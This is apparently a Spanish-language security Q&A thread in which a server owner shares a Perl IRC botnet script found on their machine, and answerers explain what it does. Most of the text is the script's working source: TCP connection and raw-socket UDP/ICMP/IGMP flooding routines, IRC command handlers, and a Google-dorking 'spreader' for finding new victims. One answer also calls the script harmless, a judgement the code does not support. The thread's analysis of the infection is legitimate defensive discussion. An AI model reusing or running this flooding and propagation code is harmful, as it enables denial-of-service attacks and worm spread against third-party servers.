  $cur_time = time - $itime;
  while ($l<1000){
   $cur_time = time - $itime;
   last if $cur_time >= $ftime;
   $t="SOCK$l";
   socket($t,PF_INET,SOCK_STREAM,$proto);
   connect($t,$pa)||$j--;
   $j++;$l++;
  }
  $l=0;
  while ($l<1000){
   $cur_time = time - $itime;
   last if $cur_time >= $ftime;
   $t="SOCK$l";
   shutdown($t,2);
   $l++;
  }
 }

 sub udpflooder {
   my $iaddr = inet_aton($_[0]);
   my $msg = 'A' x $_[1];
   my $ftime = $_[2];
   my $cp = 0;
   my (%pacotes);
   $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

   socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
   socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
   socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
   socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
   return(undef) if $cp == 4;
   my $itime = time;
   my ($cur_time);
   while ( 1 ) {
      for (my $porta = 1; $porta <= 65000; $porta++) {
        $cur_time = time - $itime;
        last if $cur_time >= $ftime;
        send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
        send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
        send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
        send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;

        for (my $pc = 3; $pc <= 255;$pc++) {
          next if $pc == 6;
          $cur_time = time - $itime;
          last if $cur_time >= $ftime;
          socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
          send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
        }
      }
      last if $cur_time >= $ftime;
   }
   return($cur_time, %pacotes);
 }

 sub ctcp {
    return unless $#_ == 1;
    sendraw("PRIVMSG $_[0] :%pre%1$_[1]%pre%1");
 }
 sub msg {
    return unless $#_ == 1;
    sendraw("PRIVMSG $_[0] :$_[1]");
 }
 sub notice {
    return unless $#_ == 1;
    sendraw("NOTICE $_[0] :$_[1]");
 }
 sub op {
    return unless $#_ == 1;
    sendraw("MODE $_[0] +o $_[1]");
 }
 sub deop {
    return unless $#_ == 1;
    sendraw("MODE $_[0] -o $_[1]");
 }
 sub j { &join(@_); }
 sub join {
    return unless $#_ == 0;
    sendraw("JOIN $_[0]");
 }
 sub p { part(@_); }
 sub part {
   sendraw("PART $_[0]");
 }
 sub nick {
   return unless $#_ == 0;
   sendraw("NICK $_[0]");
 }
 sub quit {
   sendraw("QUIT :$_[0]");
 }

 # Spreader
 # this 'spreader' code isnot mine, i dont know who coded it.
 # update: well, i just fix0red this shit a bit.
 #

 sub fetch(){
     my $rnd=(int(rand(9999)));
     my $n= 80;
     if ($rnd<5000) { $n<<=1;}
     my $s= (int(rand(5)) * $n);

 my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
   "py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
   "af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
   "vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
   "ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
   "iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
   "ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
   "na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",
   "sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
   "vu","vn","ye","yu","cd","zm","zw","");
 my @str;

 foreach $dom  (@dominios)
 {
  push (@str,"allinurl:%22".$dom."/".$goni."%22");
 }

     my $query="www.google.com/search?q=";
     $query.=$str[(rand(scalar(@str)))];
     $query.="&num=$n&start=$s";


     my @lst=();
     my $page = http_query($query);
     while ($page =~  m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
  if ($1 !~ m/google|cache|translate/){
      push (@lst,$1);
  }
     }
     return (@lst);
 }


 sub http_query($){
     my ($url) = @_;
     my $host=$url;
     my $query=$url;

     my $page="";
     $host =~ s/href=\"?http:\/\///;
     $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
     $query =~s/$host//;
     if ($query eq "") {$query="/";};
     eval {
  local $SIG{ALRM} = sub { die "1";};
  alarm 10;
  my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
  print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
  my @r = <$sock>;
  $page="@r";
  alarm 0;
  close($sock);
     };
     return $page;

 }
    
pregunta Rоry McCune 07.11.2013 - 23:25
fuente

2 respuestas

1

Como se mencionó en los comentarios, parece que alguien ha estado intentando infectar tu servidor con su botnet / gusano IRC. Esencialmente, este sería el flujo del atacante:

  1. Localice los hosts para intentar un exploit público o de 0 días (en este caso, algunos exploits de joomla)
  2. Intente infectar los hosts con su script basado en perl, que conecta su servidor, a su botnet
  3. Controla una horda de servidores desde un canal IRC.

El script de Perl que mencionó en su pregunta, permite el dorking de Google (encontrar hosts más vulnerables para ejecutar exploits), escaneo de puertos, ejecución de código remoto y también otras acciones maliciosas, por ejemplo. spamming.

    
respondido por el infosec 06.12.2013 - 03:48
fuente
-1

Tengo el mismo script en mi servidor.

IP de IRC: 77.79.83.154

Es un script infantil inofensivo con demasiado tiempo.

    
respondido por el Harry 09.12.2013 - 11:30
fuente

Lea otras preguntas en las etiquetas

optimización de código y seguridad? ¿Heartbleed afecta a los servidores si OpenSSL solo se usó para generar el certificado?